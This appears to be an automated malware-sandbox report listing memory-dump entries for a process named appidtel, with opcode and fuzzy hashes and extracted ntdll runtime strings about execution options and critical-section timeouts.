                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dadadd10b2a3ae685748351cb8dbdec8c01c4de277820ecfd3feca55167fdd77
                                                      • Instruction ID: 6eac6c0c73d3c6e68e63260d69a6964496db4035eca0b3c70670a4fc40e4d919
                                                      • Opcode Fuzzy Hash: dadadd10b2a3ae685748351cb8dbdec8c01c4de277820ecfd3feca55167fdd77
                                                      • Instruction Fuzzy Hash: 56900261611504425540B1584804406600597E2301399C116A1558560C87188995926D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 793715dc526cbc25daba69e866d236b5be5a4ed1c918d0732b9561c79f723872
                                                      • Instruction ID: 0d57ac117a252b2a9d4c2968a25f7ce78802300b8aa48cccc03dcb72acbbbd6e
                                                      • Opcode Fuzzy Hash: 793715dc526cbc25daba69e866d236b5be5a4ed1c918d0732b9561c79f723872
                                                      • Instruction Fuzzy Hash: A590023161540C02E550B1584414746000587D1301F59C012A1028654D87558B9576A5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: acdf1fefe57965823f36d0aa60dba85d025b93f15a98b26a49cbed93f1f7ad83
                                                      • Instruction ID: f1c07a754582414cfb5516587b8f1c7a11d9434493955ab9cba9bb7359c9f435
                                                      • Opcode Fuzzy Hash: acdf1fefe57965823f36d0aa60dba85d025b93f15a98b26a49cbed93f1f7ad83
                                                      • Instruction Fuzzy Hash: BA90023121140C02E504B1584804686000587D1301F59C012A7028655E976589D17135
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02a437d9907b02a5706da8051ea3eceef133de1dbfa9e0dccdfd0f4e77b1b4d1
                                                      • Instruction ID: abdbb749063c6d4bd0669fbaeab9a17b9e1571201a8f9e8fde11f6a10d26370e
                                                      • Opcode Fuzzy Hash: 02a437d9907b02a5706da8051ea3eceef133de1dbfa9e0dccdfd0f4e77b1b4d1
                                                      • Instruction Fuzzy Hash: 9090023121544C42E540B1584404A46001587D1305F59C012A1068694D97258E95B665
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48aec4a88264053fee3a690116c6d47f3da866391e3c816ee44c0c30401c4ab5
                                                      • Instruction ID: c8d6a29e7d4bb714ca25c9e36ee62ca06a51bbf1dbb0e87349a4c3bf4d25d95a
                                                      • Opcode Fuzzy Hash: 48aec4a88264053fee3a690116c6d47f3da866391e3c816ee44c0c30401c4ab5
                                                      • Instruction Fuzzy Hash: CC90023121140C02E580B158440464A000587D2301F99C016A1029654DCB158B9977A5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a19fb44b88c0cda50cd64254ea4fee516bd896befc16e3f758c9ecee6ec1c62
                                                      • Instruction ID: 46155a839293cb1ef8e1c981f9df43908da70530b6f5d573182dd7594048c56b
                                                      • Opcode Fuzzy Hash: 5a19fb44b88c0cda50cd64254ea4fee516bd896befc16e3f758c9ecee6ec1c62
                                                      • Instruction Fuzzy Hash: 6D9002A1211544925900F2588404B0A450587E1201B59C017E2058560CC62589919139
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 13e5d4857d59d37bcfd536aed8111a853e5f0b31e9943e6626e4c9c8eb623914
                                                      • Instruction ID: 184448a99f76b2e9c146a8facc2870eb380ff4a32440a010fb3f57237bb470df
                                                      • Opcode Fuzzy Hash: 13e5d4857d59d37bcfd536aed8111a853e5f0b31e9943e6626e4c9c8eb623914
                                                      • Instruction Fuzzy Hash: F4900225231404021545F558060450B044597D7351399C016F241A590CC72189A55325
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dacd83fb5aa20fb50b28374ce833333d0855f29b30acfd1bef5d62a4555fbc05
                                                      • Instruction ID: d89efa72ff3a0bd27c4800e1b82e1fea77932c8804e74b72a72b217fc8ad1fad
                                                      • Opcode Fuzzy Hash: dacd83fb5aa20fb50b28374ce833333d0855f29b30acfd1bef5d62a4555fbc05
                                                      • Instruction Fuzzy Hash: 04900225221404031505F5580704507004687D6351359C022F2019550CD72189A15125
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 36487840d006e90649214ae6f1199a586533f48311538fdd0430ba63d4859221
                                                      • Instruction ID: b03f45da7cbae661207ca5715caa127ed644f2d1a88e265df674ee0d7ccf2f21
                                                      • Opcode Fuzzy Hash: 36487840d006e90649214ae6f1199a586533f48311538fdd0430ba63d4859221
                                                      • Instruction Fuzzy Hash: 3590022125545502E550B15C44046164005A7E1201F59C022A1818594D865589956225
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f886a75dd2bb6f0f2eef36bd23e3e6050b0c0ca3a1773423159ea415388394d8
                                                      • Instruction ID: b18e8d29bbe77748098c70680080be452e7479d920f0b9eda1ffd640685e4739
                                                      • Opcode Fuzzy Hash: f886a75dd2bb6f0f2eef36bd23e3e6050b0c0ca3a1773423159ea415388394d8
                                                      • Instruction Fuzzy Hash: 8890026135140842E500B1584414B060005C7E2301F59C016E2068554D8719CD92612A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fbb409f8e020cead50839fcc2a5daca9145bbe58c9f7226acb2f31e77ffc12da
                                                      • Instruction ID: b39b3e3068628d1f73a0334af73afb8aa4f7e088e19ac47ed15f89669901c691
                                                      • Opcode Fuzzy Hash: fbb409f8e020cead50839fcc2a5daca9145bbe58c9f7226acb2f31e77ffc12da
                                                      • Instruction Fuzzy Hash: D490026122140442E504B1584404706004587E2201F59C013A3158554CC6298DA15129
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f31da1bd062c86a4e47985d3de9efaee848ca5fe59b22977f6a3e9e7e1ce99a
                                                      • Instruction ID: 4bf13704d74e4fa3efb17690ffbc597b3a55e1abb333946125eab40cfe9015a2
                                                      • Opcode Fuzzy Hash: 3f31da1bd062c86a4e47985d3de9efaee848ca5fe59b22977f6a3e9e7e1ce99a
                                                      • Instruction Fuzzy Hash: 2990023121180802E500B1584808747000587D1302F59C012A6168555E8765C9D16535
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 19d51078993b9e467daea03eb3c4c2ce680351fae0a21485b07a446d89987405
                                                      • Instruction ID: 731d5d67332cde76541c67c2caaa5d139c563f38a34fdafa0392e66c7c5a5ff7
                                                      • Opcode Fuzzy Hash: 19d51078993b9e467daea03eb3c4c2ce680351fae0a21485b07a446d89987405
                                                      • Instruction Fuzzy Hash: 0F900221611404425540B16888449064005ABE2211759C122A199C550D865989A55669
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d31976e19f84e74c70a8549ef27fa8bb2de6ed1e21e81c04d6d2d12a36834ad2
                                                      • Instruction ID: e3596aefba9d87de523aa52ce179c0ac6ebd9ecb2dfc52548aa58b32f0087c5f
                                                      • Opcode Fuzzy Hash: d31976e19f84e74c70a8549ef27fa8bb2de6ed1e21e81c04d6d2d12a36834ad2
                                                      • Instruction Fuzzy Hash: E390023121180802E500B158481470B000587D1302F59C012A2168555D872589916575
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c80335fd131ddddeeb2493fc67da24041e9c9b5fb8d20369a1e1bbd33eb21b61
                                                      • Instruction ID: 35dc5b04c1760da3cae9d9eedf62bb44ed06340bce08427dd93f15167080df59
                                                      • Opcode Fuzzy Hash: c80335fd131ddddeeb2493fc67da24041e9c9b5fb8d20369a1e1bbd33eb21b61
                                                      • Instruction Fuzzy Hash: 04900221221C0442E600B5684C14B07000587D1303F59C116A1158554CCA1589A15525
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 911a8e6bd75dea9abc0bb77c0bbfb4e2bef6d187828ce1570540b943cc82859f
                                                      • Instruction ID: 3536715c9dd0fcc6cecadab64ed3e957f88d03db758b22280da582ba49e48a0c
                                                      • Opcode Fuzzy Hash: 911a8e6bd75dea9abc0bb77c0bbfb4e2bef6d187828ce1570540b943cc82859f
                                                      • Instruction Fuzzy Hash: B190022131140802E502B15844146060009C7D2345F99C013E2428555D87258A93A136
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 138eabfc347f49830fb75a4bbc72bd4fb91799c4c6b3d1560fc58d4e63c72d73
                                                      • Instruction ID: 9906cb23dbb41a613bcf4fef8c36b9433362809301bc0d4c2611c8e0a4971b79
                                                      • Opcode Fuzzy Hash: 138eabfc347f49830fb75a4bbc72bd4fb91799c4c6b3d1560fc58d4e63c72d73
                                                      • Instruction Fuzzy Hash: 0A90027121140802E540B1584404746000587D1301F59C012A6068554E87598ED56669
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9d92a8506e75a58cea958c2c222c4789eb70989e1bc475ab7d07460c0fbd4db7
                                                      • Instruction ID: 83cb91beb4b40488fcee8b88ea129e4152d0fa313d2f8bee60495fde933a1512
                                                      • Opcode Fuzzy Hash: 9d92a8506e75a58cea958c2c222c4789eb70989e1bc475ab7d07460c0fbd4db7
                                                      • Instruction Fuzzy Hash: 2E90022161140902E501B1584404616000A87D1241F99C023A2028555ECB258AD2A135
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e6121e4c5939dbd787453392f05b1b6abb73fe418e9fe0ba67d01473bc2e7d73
                                                      • Instruction ID: 44864b6ced1c066c74e950dadb7e60f231c6f7fc51714250d0aae4d3b49156bf
                                                      • Opcode Fuzzy Hash: e6121e4c5939dbd787453392f05b1b6abb73fe418e9fe0ba67d01473bc2e7d73
                                                      • Instruction Fuzzy Hash: C490026121180803E540B5584804607000587D1302F59C012A3068555E8B298D916139
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8af8b97e67dcb1e03785516ad1b5bcd43c72aee9c6c9e17da25d9d0131cc11f6
                                                      • Instruction ID: b92d89b85e203fe8a9ea813f73578192a4e56e83d7e8d1bbd084cfc89e5d27b4
                                                      • Opcode Fuzzy Hash: 8af8b97e67dcb1e03785516ad1b5bcd43c72aee9c6c9e17da25d9d0131cc11f6
                                                      • Instruction Fuzzy Hash: 0490022131140403E540B15854186064005D7E2301F59D012E1418554CDA1589965226
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b1f9c144f4a005a16d0bb1e8ff1edbe7947b3142d2cd298705f71911007601c
                                                      • Instruction ID: 8cff870d618421037291fdbe4574f0a804fb99ad63e5ec18b50eeb7a9a621f6a
                                                      • Opcode Fuzzy Hash: 2b1f9c144f4a005a16d0bb1e8ff1edbe7947b3142d2cd298705f71911007601c
                                                      • Instruction Fuzzy Hash: E790022121544842E500B5585408A06000587D1205F59D012A2068595DC7358991A135
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dc2beddb1c4a5e1d3f0c1dc8b665f5460d6df6470b3b240dd0589c32164ef8e2
                                                      • Instruction ID: 39a364bd8b067457e51a0df9142213335261c6ea871117ca431603d9f5192b77
                                                      • Opcode Fuzzy Hash: dc2beddb1c4a5e1d3f0c1dc8b665f5460d6df6470b3b240dd0589c32164ef8e2
                                                      • Instruction Fuzzy Hash: 6590023121240542A940B2585804A4E410587E2302B99D416A1019554CCA1489A15225
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 354811f4ea62f2245819d90595e4e187d85a83200c62b0ee35020f59949c6f41
                                                      • Instruction ID: f8b8d7c559a217606cc4f1eff19dce5aee95fc3122f9161dd0fd86315413a997
                                                      • Opcode Fuzzy Hash: 354811f4ea62f2245819d90595e4e187d85a83200c62b0ee35020f59949c6f41
                                                      • Instruction Fuzzy Hash: 5B90022922340402E580B158540860A000587D2202F99D416A1019558CCA1589A95325
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47aff6fdb93e4e0bf9d464b769362b2bebc030dd1c4ad00fa570e4cb72317f98
                                                      • Instruction ID: d0ae3118ba3149f3bf0658eec7667292286d98a4185827c259dfedb432cd5b04
                                                      • Opcode Fuzzy Hash: 47aff6fdb93e4e0bf9d464b769362b2bebc030dd1c4ad00fa570e4cb72317f98
                                                      • Instruction Fuzzy Hash: 4790023521140802E910B1585804646004687D1301F59D412A1428558D875489E1A125
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f97d62d42c59fa9731b1993d2bff9623dfcf427e413c748b61f42a52f83b8be
                                                      • Instruction ID: e65e689a70fd3f2c1b4ce2aa59ec2ac7b3a192f024cb61f437952bfac73dfae7
                                                      • Opcode Fuzzy Hash: 1f97d62d42c59fa9731b1993d2bff9623dfcf427e413c748b61f42a52f83b8be
                                                      • Instruction Fuzzy Hash: DF90023125140802E541B1584404606000997D1241F99C013A1428554E87558B96AA65
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3aea5fb17ff4419eb2c854b3935ff9944f2c7edaf049aad3163497316bc87553
                                                      • Instruction ID: 0fd728e6d7c1a158be47b05270d45ff5b6415ed99b031ad31048da788a48573e
                                                      • Opcode Fuzzy Hash: 3aea5fb17ff4419eb2c854b3935ff9944f2c7edaf049aad3163497316bc87553
                                                      • Instruction Fuzzy Hash: 96900221252445526945F1584404507400697E1241799C013A2418950C86269996D625
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0dd0391fe8397814be6ebe8a670f42ee1dde2dbc00caca65a5e8662e081083f1
                                                      • Instruction ID: 3cefe485fab199222250a78b08bca4f5f17f2e1b893ffd35f92db49884e71c96
                                                      • Opcode Fuzzy Hash: 0dd0391fe8397814be6ebe8a670f42ee1dde2dbc00caca65a5e8662e081083f1
                                                      • Instruction Fuzzy Hash: 6590023121140C42E500B1584404B46000587E1301F59C017A1128654D8715C9917525
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d697fb0aa97be175b2b7914fe472841697eb1b461e23e92c1efaaccd83c7519
                                                      • Instruction ID: d252d12f6960c86a5ac78136433748f1f3c7623c05279536a598724f35b538d3
                                                      • Opcode Fuzzy Hash: 7d697fb0aa97be175b2b7914fe472841697eb1b461e23e92c1efaaccd83c7519
                                                      • Instruction Fuzzy Hash: 1990023121140802E500B5985408646000587E1301F59D012A6028555EC76589D16135
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1200a21164ac4de408cc3bfb1b5edc14264947cdc11cbcd4c89dade67c07aad9
                                                      • Instruction ID: fa1d3587532c77fa3cc75c23cce9ebe3a1a804b0df8bf6c1e7acf56413b8db17
                                                      • Opcode Fuzzy Hash: 1200a21164ac4de408cc3bfb1b5edc14264947cdc11cbcd4c89dade67c07aad9
                                                      • Instruction Fuzzy Hash: BF90023121140803E500B1585508707000587D1201F59D412A1428558DD75689916125
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51619fe745389eba6ecd626d7e60d187232740ca8709d7089a088a9c1da59c95
                                                      • Instruction ID: c7f1adc7fa0498e578fd9152565246248ca679d6f5b9f9cd216f3d5410f042d0
                                                      • Opcode Fuzzy Hash: 51619fe745389eba6ecd626d7e60d187232740ca8709d7089a088a9c1da59c95
                                                      • Instruction Fuzzy Hash: 7C90022161540802E540B1585418706001587D1201F59D012A1028554DC7598B9566A5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction ID: ab82c4a9ab6ba1cb0d51be3a7b5572c4ccd8951e65c17e9fd7ee225fb4094e50
                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction Fuzzy Hash:
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: d0a25fb232382c75512b2e235832ac31de6b4b1d861ef381cd7e0b3887fe39e1
                                                      • Instruction ID: 31db4e4d5f303c62255d1ddc2d50360021c18b086875aaf678b612e9dea5bfdf
                                                      • Opcode Fuzzy Hash: d0a25fb232382c75512b2e235832ac31de6b4b1d861ef381cd7e0b3887fe39e1
                                                      • Instruction Fuzzy Hash: A451E9B5E20216BFCF20EF98889097EF7B8BB49240714C569E465D7681D374DED18BE0
                                                      Strings
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032B46FC
                                                      • ExecuteOptions, xrefs: 032B46A0
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 032B4725
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 032B4787
                                                      • Execute=1, xrefs: 032B4713
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 032B4742
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 032B4655
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 054d413c623a48e935058bdff75c614399780b748a5d06615b6b574e011d68c5
                                                      • Instruction ID: 460210ffc4c1bc289718e4622319cb1715a5e0e1472052a69d0a1cc4953c2c77
                                                      • Opcode Fuzzy Hash: 054d413c623a48e935058bdff75c614399780b748a5d06615b6b574e011d68c5
                                                      • Instruction Fuzzy Hash: 9551E635A21319BADB20EBA9DC85FFDB7BCBB04304F0400A9D505AB191E7B1AAC5CF51
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 815d1bbf0740644822f4ea667acc9f5881f8375a2e7b9c1f03d13380cfd25eec
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 6681DE31E2325A9ADF24EF68C8907BEBBA5AF45310F1C465ED861A73D1C67498C08B50
                                                      Strings
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032B02BD
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032B02E7
                                                      • RTL: Re-Waiting, xrefs: 032B031E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: 24f0811e050bff1048e7034324368ae350002fd2102b85822c52a09fc657e87a
                                                      • Instruction ID: bdba621aa40ed876078efdf0e5cb44db251a533166f1a74aeb6b07b166297fd5
                                                      • Opcode Fuzzy Hash: 24f0811e050bff1048e7034324368ae350002fd2102b85822c52a09fc657e87a
